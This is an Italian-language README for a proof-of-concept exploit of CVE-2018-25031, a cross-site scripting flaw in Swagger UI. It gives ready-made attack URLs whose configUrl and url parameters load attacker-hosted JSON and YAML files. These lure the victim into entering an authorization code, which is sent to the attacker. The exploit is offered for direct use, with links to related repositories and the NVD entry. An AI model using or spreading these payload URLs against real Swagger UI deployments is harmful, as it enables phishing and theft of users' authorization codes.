
Exploit proof-of-concept per CVE-2018-25031 (XSS in Swagger UI) che esfiltra i codici di autorizzazione tramite parametri configUrl/url appositamente creati.
Un semplice POC (CVE-2018-25031) che induce la vittima a inserire il codice di autorizzazione, che viene poi inviato all'attaccante.
Puoi usarlo con la vulnerabilità XSS https://github.com/VictorNS69/swagger-ui-xss
È necessario trovare il parametro e assegnare il file corretto: per configUrl, il file JSON, e per url, il file YAML.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031